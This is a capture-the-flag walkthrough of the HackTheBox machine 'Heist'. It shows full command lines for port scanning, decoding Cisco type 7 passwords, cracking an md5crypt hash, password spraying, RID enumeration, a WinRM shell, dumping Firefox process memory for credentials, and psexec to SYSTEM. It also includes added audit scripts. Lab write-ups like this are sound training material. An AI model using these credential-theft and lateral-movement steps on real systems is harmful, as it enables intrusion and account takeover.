HackTheBox — Heist Walkthrough
Summary
This is a write-up for a fairly easy machine on hackthebox.eu named Heist. The machine requires a lot of brute-forcing with the passwords we discover along the way. We start off with a config file in which we find a few passwords and usernames. We brute-force those to get a valid pair, then brute-force SIDs to find more users and use them to get a shell. After some digging we find an unusual program running; dumping its process memory gives us credentials. A bit more brute-forcing gives us access to the administrator account. Let’s get going.
Recon
We start off with a nmap scan.
nmap -sC -sV -oA nmap/initial 10.10.10.149
Looking at the results:
# Nmap 7.80 scan initiated Sat Mar 14 09:21:08 2020 as: nmap -sC -sV -oA nmap/initial 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m41s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-14T13:24:33
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 14 09:22:28 2020 -- 1 IP address (1 host up) scanned in 80.16 seconds
We got a couple of ports open. Let’s run a full nmap scan and see if we have missed anything.
nmap -sC -sV -p- -oA nmap/full 10.10.10.149
Looking at the full-port scan results:
# Nmap 7.80 scan initiated Sat Mar 14 17:03:52 2020 as: nmap -sC -sV -p- -oA nmap/full 10.10.10.149
Nmap scan report for 10.10.10.149
Host is up (0.20s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 2m42s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-03-14T22:13:15
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 14 18:11:08 2020 -- 1 IP address (1 host up) scanned in 4035.81 seconds
We got a few more ports. Port 5985 looks quite interesting: it is the default port for Windows Remote Management (WinRM), and with valid credentials we can use it to get a remote shell.
For now, lets have a look at port 80. Visiting the application, we get:
A login page. We tried some default usernames and passwords, but it asks for an email. As we don’t have an email we cannot brute-force the login. But the page also gives us access to the portal as a guest. Let’s go in through that.
Logging in through guest we see that there is an issue created by Hazard, this can be a potential user. We save the username in a file and move on to explore a bit more. We observe that there is an attachment, let’s go through it.
It is a config file.
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
We can see a few passwords in the file. They are Cisco type 7 passwords, which use a reversible encoding and can be decoded. We will be using ciscot7 to recover them. Along with that we get two more usernames, rout3r and admin, which we add to our usernames list. We also have an enable secret 5 hash, which is an MD5-based (md5crypt) hash; we can try hashcat to crack it.
Let’s start with the type 7 password. We start by cloning the GitHub repository.
git clone https://github.com/theevilbit/ciscot7.git
Let’s get in to the repository and crack the passwords.
cd ciscot7
python3 ciscot7.py -d -p 0242114B0E143F015F5D1E161713
python3 ciscot7.py -d -p 02375012182C1A1D751618034F36415408
We get two passwords, let’s add them to our password list.
Let’s crack the secret 5 with hashcat.
hashcat -m 500 heist_hash /usr/share/wordlists/rockyou.txt --force
And we get a password. Let’s add this too to our password list.
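As an added illustration (not part of the original write-up, and not the ciscot7 tool), here is a small Python audit script that flags the weak credential types found in a config like the one above and shows why type 7 is only obfuscation by reversing the encoding itself. The key string is Cisco's public type 7 key; the sample config lines are the credential lines from the attachment above; `audit_config` and `decode_type7` are names chosen here.

```python
import re

# Cisco's fixed type 7 key (public since the 1990s). Type 7 is a repeating-key XOR
# against this string, so "service password-encryption" only obfuscates passwords.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Matches "username <u> [privilege N] password|secret <type> <value>" and "enable secret <type> <value>"
CRED_LINE = re.compile(
    r"^\s*(?:username\s+(?P<user>\S+)\s+(?:privilege\s+\d+\s+)?)?"
    r"(?P<kw>enable secret|password|secret)\s+(?P<type>\d)\s+(?P<val>\S+)")

def decode_type7(enc: str) -> str:
    """Reverse a type 7 string: two decimal digits give the key offset, the rest is hex
    ciphertext; each byte is XORed with the key character at offset + position."""
    if len(enc) < 4 or len(enc) % 2 or not enc[:2].isdigit():
        raise ValueError("not a type 7 string")
    seed, data = int(enc[:2]), bytes.fromhex(enc[2:])
    plain = bytes(b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return plain.decode("latin-1")

def audit_config(config: str) -> list:
    """Return (user, keyword, type, finding) for every credential that is not type 8/9."""
    findings = []
    for line in config.splitlines():
        m = CRED_LINE.match(line)
        if not m:
            continue
        user, kw, typ, val = m["user"] or "<enable>", m["kw"], m["type"], m["val"]
        if typ == "7":
            findings.append((user, kw, typ, "reversible; decodes to " + decode_type7(val)))
        elif typ == "5":
            findings.append((user, kw, typ, "md5crypt; offline-crackable (hashcat -m 500)"))
        elif typ == "0":
            findings.append((user, kw, typ, "cleartext"))
        # type 8 (PBKDF2-SHA256) and type 9 (scrypt) are the acceptable forms, not reported
    return findings

# Constructed sample: the credential lines from the config attached to the ticket.
SAMPLE_CONFIG = """\
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    for user, kw, typ, finding in audit_config(SAMPLE_CONFIG):
        print(f"{user:10} {kw:14} type {typ}: {finding}")
```

The fix on the device side is to replace every `password 7` with a `secret` of type 8 or 9, which the script deliberately does not report.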
Next, we use crackmapexec to see if we have any valid username and password combination. I prefer the bleeding edge version of the tool; we can follow the wiki to install it on our machine. After the installation is complete, we can move on to enumerate users.
crackmapexec -u users.txt -p passwords.txt --shares 10.10.10.149
We get only one valid user: Hazard
Let’s check if Hazard has access to WinRM. We will be using evil-winrm to check; we need to install the required gems for its dependencies.
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
gem install winrm winrm-fs stringio
Now copy the evil-winrm.rb to the working directory and we will run and check.
ruby evil-winrm.rb -i 10.10.10.149 -u hazard -p stealth1agent
But we cannot get authorized.
Initial Foothold
We cannot get authorized, but we have at least one valid user. We can leverage this to get more users using rpcclient.
rpcclient -U 'hazard%stealth1agent' 10.10.10.149
Now we can use lookupnames, which gives us SIDs; with those we can brute-force RIDs and get more users on the box. A SID is a unique security identifier for a user or group. It is of variable length and can be broken into three pieces:
S-1-5-21-4254423774-1266059056-3197185112-500
S-1-5: this defines the identifier authority
21-4254423774-1266059056-3197185112: this is the domain-specific identifier
500: identifies the user (500 is the default RID for Administrator)
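As an added example (not from the original write-up), here is a small Python parser that splits a SID into the three pieces above and reviews a list of SIDs the way one would when checking rpcclient or lookupsid.py output for the built-in Administrator account. The function names, the well-known-RID table and the RID 1008 entry are chosen here; the domain identifier is the one shown above.

```python
import re

# Grammar of a SID string: S-<revision>-<identifier authority>-<sub-authorities...>-<RID>
SID_RE = re.compile(r"^S-(?P<rev>\d+)-(?P<auth>\d+)(?P<subs>(?:-\d+)+)$")

# Well-known relative identifiers; RID 500 is the built-in Administrator even if renamed.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}

def parse_sid(sid: str) -> dict:
    """Split a SID into the three pieces described above (authority, domain part, RID)."""
    m = SID_RE.match(sid.strip().replace("\u2013", "-"))  # tolerate en-dashes from copy/paste
    if not m:
        raise ValueError(f"malformed SID: {sid!r}")
    subs = [int(x) for x in m["subs"].split("-")[1:]]
    rid = subs[-1]
    return {
        "authority": f"S-{m['rev']}-{m['auth']}",
        "domain": "-".join(str(s) for s in subs[:-1]),
        "rid": rid,
        "well_known": WELL_KNOWN_RIDS.get(rid),
        "user_created": rid >= 1000,  # RIDs below 1000 are reserved for built-in accounts
    }

def review_sids(sids: list) -> dict:
    """Group SIDs by domain identifier and list RID-500 accounts, which is how an auditor
    spots a renamed built-in Administrator in enumeration output."""
    by_domain, builtin_admins = {}, []
    for s in sids:
        p = parse_sid(s)
        by_domain.setdefault(p["domain"], []).append(p["rid"])
        if p["rid"] == 500:
            builtin_admins.append(s)
    return {"domains": by_domain, "builtin_admins": builtin_admins}

# Constructed sample: the machine's domain identifier from above plus a few RIDs
# (500 and 501 are well known; 1008 is an invented user-created account).
SAMPLE_SIDS = [
    "S-1-5-21-4254423774-1266059056-3197185112-500",
    "S-1-5-21-4254423774-1266059056-3197185112-501",
    "S-1-5-21-4254423774-1266059056-3197185112-1008",
]

if __name__ == "__main__":
    for s in SAMPLE_SIDS:
        print(parse_sid(s))
    print(review_sids(SAMPLE_SIDS))
```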
More information can be found here.
Now, we can look into our results.
We get a few more users: Administrator, Jason, Chase, support. Let’s add them to our users list and see if we get any more valid credentials. We can also automate the user discovery using lookupsid.py from impacket.
python3 lookupsid.py hazard:stealth1agent@10.10.10.149
Make sure you remove the already-validated username and password from the username and password files respectively, as crackmapexec stops as soon as it hits a valid user. Then run the command again with the updated lists.
crackmapexec -u users.txt -p passwords.txt --shares 10.10.10.149
Looking at the results we find Chase as another valid user.
Let’s try evil-winrm with Chase’s credentials.
ruby evil-winrm.rb -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d'
And voila we get a shell.
Enumeration
Let’s dig around and see how we can escalate to administrator.
In the Desktop folder we find todo.txt. Looking at it we can’t find anything interesting.
Let’s look at the installed programs. We can see that Mozilla Firefox is installed, which is not a default program. Let’s check whether it is running.
Listing the running processes, we can see that Firefox is running. Let’s dump the process.
To dump the process we can use procdump64.exe from the Microsoft Sysinternals suite. This has the advantage that, being a signed Microsoft tool, it doesn’t get in trouble with the signatures. Upload procdump64.exe to the remote machine:
upload procdump64.exe (in the remote shell)
Then run,
./procdump64.exe -accepteula -ma 1264
where 1264 is the process ID we got from the previous command.
Download the process dump to local machine.
download firefox.exe_200315_044138.dmp
It might take a while as it is large file (~292 MB).
We can now run strings on the dump file and grep for passwords and the like.
strings firefox.exe_200315_044138.dmp | grep password
Now we have an email-id: admin@support.htb and password: 4dD!5}x/re8]FBuZ. We can use this to login to the portal and see if we have anything extra. Alas! there is nothing.
Privilege Escalation
Let’s move ahead, add the password to the password list, remove the previously matched ones and run crackmapexec again.
crackmapexec -u users.txt -p passwords.txt --shares 10.10.10.149
Looking at the output we see that administrator is flagged as pwned, which generally means the account has read and write access to the ADMIN$ and C$ shares, from where we can run psexec.py from impacket and get a shell.
Let us try that.
python3 psexec.py administrator@10.10.10.149
Voila! We have a shell as NT AUTHORITY\SYSTEM.
Flags
PS C:\Users\Administrator\Desktop> gc root.txt
50dfa3c6bfd..3d766897
PS C:\Users\Administrator\Desktop> gc C:\users\chase\desktop\user.txt
a127daef77a..295f59c4
This was a small write-up on Heist.
~m1kU